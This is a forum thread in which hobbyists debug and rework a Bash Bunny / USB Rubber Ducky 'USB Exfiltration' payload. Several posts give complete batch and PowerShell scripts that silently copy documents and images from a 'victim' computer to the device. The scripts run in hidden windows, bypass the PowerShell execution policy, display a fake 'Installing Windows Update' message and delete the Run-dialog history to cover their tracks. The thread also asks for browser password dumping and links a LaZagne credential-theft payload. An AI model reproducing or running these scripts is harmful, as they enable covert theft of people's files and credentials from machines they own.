zerocooler Posted March 17, 2017 Share Posted March 17, 2017 On 3/10/2017 at 1:06 PM, kpeezy said: Hey guys quick question, May be a noob question but I'm trying to get this payload to work. Where do i put d.cmd, e.cmd, and i.vbs files? do they go in the switch1 folder along with the payload or do they go in the library folder? Thank you, kpeezy Yes, put it all in the switch you want to execute from. I just did this myself a few minutes ago. See pic. Link to comment Share on other sites More sharing options...
zerocooler Posted March 17, 2017 Share Posted March 17, 2017 On 3/8/2017 at 11:49 PM, aawawa said: Guys, anyone know if payload exist for ex-filtration / dump of all browser(s) saved usernames/passwords? Yea, I'm really new to bash-scripting and would love to see more examples of different types of "goodies" files extracted. Temp. internet files, browsing history, maybe just a list of documents printed in a log file? A list would be great if you had a second shot at the same machine and knew exactly what to search for. This way, you don't have to worry so much about space. Link to comment Share on other sites More sharing options...
nutt318 Posted March 17, 2017 Share Posted March 17, 2017 14 hours ago, zerocooler said: I have yet to see any log file. Though, I suppose you could have it write one along-side what it's doing. It appears to be working but then it never copies any files. I might play around with some different file formats or folder locations. Link to comment Share on other sites More sharing options...
Valo Posted March 19, 2017 Share Posted March 19, 2017 Morning! I'm by no means an expert with code, but I was having a lot of issues trying to get this script to work. I think I've narrowed down to what is causing my issues and got it to work: Quote payload.txt line 21 QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" Quote e.cmd line 9 set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% When payload runs, the string that is typed to cmd is: Quote powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads#switch1#d.cmd') which results in error and no files copied. If changed to: Quote powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\d.cmd') I hit the second blocker in e.cmd. A file in the loot folder will be created under USB_exfiltration with the PC name, some numbers followed by an "_" The script returns no copied files. If line9 is changed to: Quote set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME% The script runs with no problems. Any suggestions as to why this may be and how to fix the payload.txt issue? Thanks! Link to comment Share on other sites More sharing options...
ArmedWeasel Posted March 19, 2017 Share Posted March 19, 2017 7 hours ago, Valo said: The script runs with no problems. Any suggestions as to why this may be and how to fix the payload.txt issue? Thanks! I tinker around but am by no means talented or well versed in dorking with scripted windows commands... Having said that, I believe that the issue is with the system clock in windows being set to displaying in 24hr format. I'm honestly too tired to test this proper at the moment but I'll switch my system clock from 24hr to 12 in the morning and see if that fixes the issue. Cheers and goodnight. Link to comment Share on other sites More sharing options...
Valo Posted March 19, 2017 Share Posted March 19, 2017 After a couple hours of playing around, it turns out the initial issue of the \\ becoming # is due to the keyboard language, after SET_LANGUAGE gb, this was fixed. I think you're right about the 24hr format ArmedWeasel, I can get the date to display fine, but the time is what is messing that part of the script up. No big issue really as date is sufficient for my needs :) Link to comment Share on other sites More sharing options...
GermanNoob Posted March 19, 2017 Share Posted March 19, 2017 On 17.3.2017 at 1:12 AM, zerocooler said: Yea, I'm really new to bash-scripting and would love to see more examples of different types of "goodies" files extracted. Temp. internet files, browsing history, maybe just a list of documents printed in a log file? A list would be great if you had a second shot at the same machine and knew exactly what to search for. This way, you don't have to worry so much about space. On 9.3.2017 at 5:49 AM, aawawa said: Guys, anyone know if payload exist for ex-filtration / dump of all browser(s) saved usernames/passwords? Hi guys, I added an laZagne payload to achieve this (and more). Pull request to the official GitHub is already made. You can find the payload meanwhile here: https://github.com/GermanNoob/bashbunny-payloads/tree/laZagne/payloads/library/laZagne Link to comment Share on other sites More sharing options...
GermanNoob Posted March 19, 2017 Share Posted March 19, 2017 8 hours ago, Valo said: When payload runs, the string that is typed to cmd is: Quote powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads#switch1#d.cmd') which results in error and no files copied. If changed to: Quote powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\d.cmd') I hit the second blocker in e.cmd. A file in the loot folder will be created under USB_exfiltration with the PC name, some numbers followed by an "_" The script returns no copied files. Hi @Valo be sure to use the newest version of the complete GitHub repository! Which version of windows are you using? Link to comment Share on other sites More sharing options...
Valo Posted March 19, 2017 Share Posted March 19, 2017 I'm on win7 x64. Already set git up and got the latest packages. @GermanNoob once I ran the DuckyInstall and specified the language to use (gb) in the script the first problem was solved. The timecode is the only thing stopping it working out the box for me now, but i've tweaked it to my preferences (ie removing the time stamp but leaving the date) now and have it working :) Link to comment Share on other sites More sharing options...
ArmedWeasel Posted March 19, 2017 Share Posted March 19, 2017 Didn't bother with testing the time theory yet however i did get a for loop working for multiple file types. My e.cmd file: @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Time and date stamps that are agnostic to user/system preference as it pulls them off the system and formats it the way you want it. for /f "delims=" %%a in ('wmic OS Get localdatetime ^| find "."') do set dt=%%a set datestamp=%dt:~0,8% set timestamp=%dt:~8,6% set YYYY=%dt:~0,4% set MM=%dt:~4,2% set DD=%dt:~6,2% set HH=%dt:~8,2% set Min=%dt:~10,2% set Sec=%dt:~12,2% set stamp=%YYYY%-%MM%-%DD% REM Creates directory comprised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%datestamp%_%timestamp% mkdir %dst% >>nul mkdir %dst%\Desktop mkdir %dst%\Documents if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM 'For Loop' usage example. for %%e in (doc pdf wri txt ppt xls) do ( xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.%%e %dst%\Documents >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.%%e %dst%\Desktop >>nul ) REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.txt %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.xls %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.wri %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.doc %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.rtf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Given, I don't have a whole lot of stuff on this particular testbox but I didn't notice any huge difference between the loop and the multiple copy paste versions regarding how long it takes to do its hunt and write operations. For ease of reading I've pulled out the important parts below: REM Time and date stamps that are agnostic to user/system preference as it pulls them off the system and formats it the way you want it. for /f "delims=" %%a in ('wmic OS Get localdatetime ^| find "."') do set dt=%%a set datestamp=%dt:~0,8% set timestamp=%dt:~8,6% Time\date stamp. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%datestamp%_%timestamp% Directory name using datestamp and timestamp, output looks like <victim>\20170319_225705. The time output you see there is HHMMSS. Also, %stamp% gives you an output that looks <victim>\_2017-03-19. Hope this helps someone. Was actually a helluva lot of fun figuring out. Cheers. Link to comment Share on other sites More sharing options...
ArmedWeasel Posted March 19, 2017 Share Posted March 19, 2017 Side note where's the edit post button? I forgot to add that if you want to be super lazy you can just use the wmic output pushed into a variable like the rest of em and it'll look something like: <prompt>wmic OS Get localdatetime | find "." <return> 20170319231304.179000+000 Windows has no problems using '.' or '+' in file/folder names but I think one of the issues with the original naming scheme is that it's dependent on the time preference not being 24hr format because the way the delims were being sliced you'd end up with colons ( : ) in the output and windows has a BIG problem with you trying to name stuff using that. So instead of just figuring out the right spacing for the delims I put far more effort into figuring out a more complicated way of displaying the information I wanted. So using the e.cmd I gave above you'd basically just put: set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%dt% output folder looks like <victim>_20170319232326.168000+000 Cheers. Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted March 30, 2017 Share Posted March 30, 2017 I found a bug with the e.cmd batch script. A typo really. I noticed it when I was debugging why it wasn't working for someone else. At line 9, it falsely refers to a variable called ~dp0, but the variable was first initiated as ~d0. Unless I am making a complete fool of myself in missing something small, I think it is a typo and is therefore bugging out everyone who has tried this. Could possibly be already fixed and I have an outdated library as well...Can you confirm @Darren Kitchen? Link to comment Share on other sites More sharing options...
ArmedWeasel Posted May 28, 2017 Share Posted May 28, 2017 On 3/29/2017 at 7:29 PM, Dave-ee Jones said: At line 9, it falsely refers to a variable called ~dp0, but the variable was first initiated as ~d0. Unless I am making a complete fool of myself in missing something small, I think it is a typo and is therefore bugging out everyone who has tried this. It's correct when it's called and defining the dst variable but the remark is missing the 'p'. You'll get a better explanation from any number of resources found by googling "%~dp0" The short answer is: that it's a quick way to reference the folder the script/commands run from (start directory) and use relative paths from that point to do navigation and further actions from or to. What it does is say starting from here go back 2 directories and then make folders named such and such. Cheers. Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted May 28, 2017 Share Posted May 28, 2017 2 hours ago, ArmedWeasel said: It's correct when it's called and defining the dst variable but the remark is missing the 'p'. You'll get a better explanation from any number of resources found by googling "%~dp0" The short answer is: that it's a quick way to reference the folder the script/commands run from (start directory) and use relative paths from that point to do navigation and further actions from or to. What it does is say starting from here go back 2 directories and then make folders named such and such. Cheers. Ah, my bad :) I've always used "..\..\" to go back multiple directories :P Makes more sense, but the way you use could definitely be easier if you have to go back like 4-5 times.. Link to comment Share on other sites More sharing options...
twc Posted June 13, 2017 Share Posted June 13, 2017 I am comfortable with loading payloads to particular switches, etc., but for some reason, I can't get the exfiltrator to do anything. When I move the switch to the proper position, I get a blinking blue LED, but no files are every copied. I had this issue both with the SMB and USB exfiltrator. Link to comment Share on other sites More sharing options...
RazerBlade Posted June 14, 2017 Share Posted June 14, 2017 Does the program even run? It has a hid stage where it types in a command. Does that happen? And if it happens but it fails check your keyboard language on the BashBunny to ensure it's correct. Link to comment Share on other sites More sharing options...
digitalchameleon Posted March 2, 2018 Share Posted March 2, 2018 Hey everyone, I know this is a noob question but I cant seem to get the bashbunny to use the USB-exfiltrator correctly. I have set up my BashBunny with the USB-Exfiltrator. I put the "d.cmd, e.cmd, i.vbs, payload.txt" files all into switch1 folder. I kept the original code (with .pdf and everything) and the closest I get to having files copied over into the BashBunny is having a folder added to the "loot folder" that says "USB-Exfiltrator" and inside is a smaller folder added but inside the folder is nothing. I purposely added 3 .pdf files to my computers documents folder just to see if it would grab any of them but no luck. I feel like its something simple that I am missing, Wondering if any of you guys can shed some light on my problem. Thanks. Link to comment Share on other sites More sharing options...
ArmedWeasel Posted March 5, 2018 Share Posted March 5, 2018 On 3/3/2018 at 7:11 AM, digitalchameleon said: Hey everyone, I know this is a noob question but I cant seem to get the bashbunny to use the USB-exfiltrator correctly. I have set up my BashBunny with the USB-Exfiltrator. I put the "d.cmd, e.cmd, i.vbs, payload.txt" files all into switch1 folder. I kept the original code (with .pdf and everything) and the closest I get to having files copied over into the BashBunny is having a folder added to the "loot folder" that says "USB-Exfiltrator" and inside is a smaller folder added but inside the folder is nothing. I purposely added 3 .pdf files to my computers documents folder just to see if it would grab any of them but no luck. I feel like its something simple that I am missing, Wondering if any of you guys can shed some light on my problem. Thanks. What does your e.cmd file look like? What version of winders/*nix/mac are you using as a victim?? Are you sure you've got the switch on the right payload before plugging it into the victim? It's been a minute since I've toyed with mine but I'll dust it off and see if we can get your critter working. Cheers. Link to comment Share on other sites More sharing options...
digitalchameleon Posted March 14, 2018 Share Posted March 14, 2018 On 3/5/2018 at 6:09 AM, ArmedWeasel said: What does your e.cmd file look like? What version of winders/*nix/mac are you using as a victim?? Are you sure you've got the switch on the right payload before plugging it into the victim? It's been a minute since I've toyed with mine but I'll dust it off and see if we can get your critter working. Cheers. Thank you ArmedWeasel for your reply, sorry for my delayed response. Attached here is my e.cmd file that i wrote and saved in Notepad ++: @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*%dst% >>nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\%dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit As for my victims computer it is just a basic windows 10 operating desktop and the position i use to arm my payloads (and etc) is in 3, I put this particular payload in payload switch 1 and when I try to execute this payload I eject the bashbunny, flip it to switch 1 and insert. It will make a folder but the folder is empty. Will having my pc run linux make any difference? Thanks. Link to comment Share on other sites More sharing options...
ArmedWeasel Posted March 14, 2018 Share Posted March 14, 2018 So the problem I've noted before is when you attack a Target with a non-standard time setting i.e. 24 hour format. For some reason the shit freaks out. Note the ~dp0 section. Either (A) remove the time stamping bullshit or (B) reference my prior posts in this thread and try again. Cheers. Link to comment Share on other sites More sharing options...
digitalchameleon Posted March 16, 2018 Share Posted March 16, 2018 On 3/14/2018 at 4:53 AM, ArmedWeasel said: So the problem I've noted before is when you attack a Target with a non-standard time setting i.e. 24 hour format. For some reason the shit freaks out. Note the ~dp0 section. Either (A) remove the time stamping bullshit or (B) reference my prior posts in this thread and try again. Cheers. Hey ArmedWeasel, I took your advice and removed the time stamp and no change. I went back to Github to confirm I had all the updated payload scripts and confirmed that I do. So I went about looking threw your previous posts and noticed a script you left for people to try: @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Time and date stamps that are agnostic to user/system preference as it pulls them off the system and formats it the way you want it. for /f "delims=" %%a in ('wmic OS Get localdatetime ^| find "."') do set dt=%%a set datestamp=%dt:~0,8% set timestamp=%dt:~8,6% set YYYY=%dt:~0,4% set MM=%dt:~4,2% set DD=%dt:~6,2% set HH=%dt:~8,2% set Min=%dt:~10,2% set Sec=%dt:~12,2% set stamp=%YYYY%-%MM%-%DD% REM Creates directory comprised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%datestamp%_%timestamp% mkdir %dst% >>nul mkdir %dst%\Desktop mkdir %dst%\Documents if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM 'For Loop' usage example. for %%e in (doc pdf wri txt ppt xls) do ( xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.%%e %dst%\Documents >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.%%e %dst%\Desktop >>nul ) REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.txt %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.xls %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.wri %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.doc %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.rtf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Its a good script and I tried that out and got it to add more folders but the same issue with no files copied. Would it be okay if I compared the scripts that you use that work for you to mine scripts? Or would you like me to post what I am currently using? Thanks for your continued help. Link to comment Share on other sites More sharing options...
Covert Error Posted March 18, 2018 Share Posted March 18, 2018 why does the bash bunny file opens up after the green LED on the bunny comes up? and when the green LED comes up(its done execution) the script is not yet done the output file would still be pulling up some files? Link to comment Share on other sites More sharing options...
Sh3ld0n Posted June 20, 2019 Share Posted June 20, 2019 about a week ago if got my UBS-Rubber-Ducky and i thought i would rework the USB Exfiltration payload from Hak5 episodes 2112 - 2114 to run as a .ps1 script and i would like to share it to get some opinions on it here is my Code: d.cmd: @echo off start powerShell.exe -nologo -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& '%~dpn0.ps1'" start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" cscript %~d0\i.vbs %~dnp0\d.ps1 REM @exit d.ps1: REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f # Setup source and destination paths $Src = ${env:USERPROFILE} $sDL = (Get-Volume -FileSystemLabel _).DriveLetter #selectin the DriveLetter $dt1=":\slurp\${Env:ComputerName}_$((Get-Date).ToString('yyyy-MM-dd _ hh-mm-ss'))"; #Destination folder $Dst=$sDL+$dt1; #combining DriveLetter with Destination folder if (!(Test-Path $Dst)) { mkdir $Dst } # Wildcard for filter $Extension = '*40983063xch*', '*.pdf', '*.jpg' # Get file recursively Get-ChildItem -Path $Src -Filter $Extension -Recurse | Where-Object {!$_.PsIsContainer} | # For each file ForEach-Object { # If file exist in destination folder, rename it with directory tag if(Test-Path -Path (Join-Path -Path $Dst -ChildPath $_.Name)) { # Get full path to the file without drive letter and replace `\` with '-' # [regex]::Escape is needed because -replace uses regex, so we should escape '\' $NameWithDirTag = (Split-Path -Path $_.FullName -NoQualifier) -replace [regex]::Escape('\'), '-' # Join new file name with destination directory $NewPath = Join-Path -Path $Dst -ChildPath $NameWithDirTag } # Don't modify new file path, if file doesn't exist in target dir else { $NewPath = $Dst } # Copy file Copy-Item -Path $_.FullName -Destination $NewPath } $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}'); exit Link to comment Share on other sites More sharing options...
flav_i0 Posted October 9, 2020 Share Posted October 9, 2020 hello, I wanted to ask why after running the payload in the loot folder I find the folders with the day and time but I can't find any files inside Link to comment Share on other sites More sharing options...
kuyaya Posted October 10, 2020 Share Posted October 10, 2020 14 hours ago, flav_i0 said: hello, I wanted to ask why after running the payload in the loot folder I find the folders with the day and time but I can't find any files inside Then there is probably an issue with the language or something else Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.